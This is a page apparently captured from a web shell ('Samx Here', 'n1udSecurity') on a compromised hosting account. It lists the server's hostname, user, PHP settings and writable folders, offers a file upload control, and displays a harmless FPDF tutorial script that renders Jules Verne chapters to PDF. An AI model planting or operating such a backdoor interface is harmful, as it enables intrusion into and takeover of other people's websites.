Samx Here
n1udSecurity


Server : Apache
System : Linux webd348.cluster026.gra.hosting.ovh.net 5.15.148-ovh-vps-grsec-zfs-classid #1 SMP Thu Feb 8 09:41:04 UTC 2024 x86_64
User : hednacluml ( 122243)
PHP Version : 8.3.9
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Directory :  /home/hednacluml/universe/lib/h5c1accba-fpdf181/tutorial/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/hednacluml/universe/lib/h5c1accba-fpdf181/tutorial/tuto3.php
<?php
require('../fpdf.php');

class PDF extends FPDF
{
function Header()
{
	global $titre;

	// Arial gras 15
	$this->SetFont('Arial','B',15);
	// Calcul de la largeur du titre et positionnement
	$w = $this->GetStringWidth($titre)+6;
	$this->SetX((210-$w)/2);
	// Couleurs du cadre, du fond et du texte
	$this->SetDrawColor(0,80,180);
	$this->SetFillColor(230,230,0);
	$this->SetTextColor(220,50,50);
	// Epaisseur du cadre (1 mm)
	$this->SetLineWidth(1);
	// Titre
	$this->Cell($w,9,$titre,1,1,'C',true);
	// Saut de ligne
	$this->Ln(10);
}

function Footer()
{
	// Positionnement � 1,5 cm du bas
	$this->SetY(-15);
	// Arial italique 8
	$this->SetFont('Arial','I',8);
	// Couleur du texte en gris
	$this->SetTextColor(128);
	// Num�ro de page
	$this->Cell(0,10,'Page '.$this->PageNo(),0,0,'C');
}

function TitreChapitre($num, $libelle)
{
	// Arial 12
	$this->SetFont('Arial','',12);
	// Couleur de fond
	$this->SetFillColor(200,220,255);
	// Titre
	$this->Cell(0,6,"Chapitre $num : $libelle",0,1,'L',true);
	// Saut de ligne
	$this->Ln(4);
}

function CorpsChapitre($fichier)
{
	// Lecture du fichier texte
	$txt = file_get_contents($fichier);
	// Times 12
	$this->SetFont('Times','',12);
	// Sortie du texte justifi�
	$this->MultiCell(0,5,$txt);
	// Saut de ligne
	$this->Ln();
	// Mention en italique
	$this->SetFont('','I');
	$this->Cell(0,5,"(fin de l'extrait)");
}

function AjouterChapitre($num, $titre, $fichier)
{
	$this->AddPage();
	$this->TitreChapitre($num,$titre);
	$this->CorpsChapitre($fichier);
}
}

$pdf = new PDF();
$titre = 'Vingt mille lieues sous les mers';
$pdf->SetTitle($titre);
$pdf->SetAuthor('Jules Verne');
$pdf->AjouterChapitre(1,'UN �CUEIL FUYANT','20k_c1.txt');
$pdf->AjouterChapitre(2,'LE POUR ET LE CONTRE','20k_c2.txt');
$pdf->Output();
?>

SAMX